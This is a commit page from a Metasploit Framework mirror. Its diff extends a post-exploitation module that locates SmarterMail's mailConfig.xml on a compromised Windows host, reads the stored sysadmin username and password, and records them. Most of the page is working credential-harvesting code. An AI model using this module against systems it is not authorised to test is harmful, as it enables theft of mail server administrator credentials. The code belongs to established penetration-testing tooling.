infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add support for shell session type

bug/bundler_fix
sinn3r 2014-02-02 23:37:56 -06:00
parent 0d02f6d589
commit e54abb4274
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 21 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
modules/post/windows/gather/credentials/smartermail.rb
View File

@ -25,20 +25,33 @@ class Metasploit3 < Msf::Post
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' => [
'Joe Giron', # Discovery and PoC (@theonlyevil1) 'Joe Giron', # Discovery and PoC (@theonlyevil1)
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit 'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
'sinn3r' # shell session support
], ],
'References' => 'References' =>
[ [
['URL', 'http://www.gironsec.com/blog/tag/cracking-smartermail/'] ['URL', 'http://www.gironsec.com/blog/tag/cracking-smartermail/']
], ],
'Platform' => ['win'], 'Platform' => ['win'],
'SessionTypes' => ['meterpreter'] 'SessionTypes' => ['meterpreter', 'shell']
)) ))
end end
def r_host
if session.type =~ /meterpreter/
session.sock.peerhost
else
session.session_host
end
end
def peer def peer
"#{session.sock.peerhost} (#{sysinfo['Computer']})" if session.type =~ /meterpreter/
"#{r_host} (#{sysinfo['Computer']})"
else
r_host
end
end end
# #
@ -58,10 +71,10 @@ class Metasploit3 < Msf::Post
# #
def get_mail_config_path def get_mail_config_path
found_path = '' found_path = ''
drive = session.fs.file.expand_path('%SystemDrive%') drive = expand_path('%SystemDrive%').strip
['Program Files (x86)', 'Program Files'].each do |program_dir| ['Program Files (x86)', 'Program Files'].each do |program_dir|
path = "#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml" path = %Q|#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip
vprint_status "#{peer} - Checking for SmarterMail config file: #{path}" vprint_status "#{peer} - Checking for SmarterMail config file: #{path}"
if file?(path) if file?(path)
found_path = path found_path = path
@ -81,7 +94,7 @@ class Metasploit3 < Msf::Post
vprint_status "#{peer} - Retrieving SmarterMail sysadmin password" vprint_status "#{peer} - Retrieving SmarterMail sysadmin password"
begin begin
data = read_file("#{path}") data = read_file(path)
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
print_error "#{peer} - Failed to download #{path} - #{e.to_s}" print_error "#{peer} - Failed to download #{path} - #{e.to_s}"
return result return result
@ -122,7 +135,7 @@ class Metasploit3 < Msf::Post
pass = result['password'] pass = result['password']
print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'" print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
report_auth_info( report_auth_info(
:host => session.sock.peerhost, :host => r_host,
:sname => 'http', :sname => 'http',
:user => user, :user => user,
:pass => pass, :pass => pass,